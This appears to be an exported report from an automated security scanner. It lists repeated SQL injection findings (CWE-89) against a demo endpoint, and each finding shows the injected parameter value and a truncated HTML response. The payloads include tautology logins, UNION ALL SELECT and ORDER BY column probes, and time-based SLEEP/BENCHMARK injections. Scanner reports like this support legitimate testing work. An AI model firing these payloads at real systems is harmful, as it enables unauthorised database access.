href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1915\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '=0--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1916\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1917\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1918\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT NULL\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1919\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1920\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1921\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1922\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1923\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))\n,4,5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1924\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1925\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1926Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1927\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1928\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 9--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID 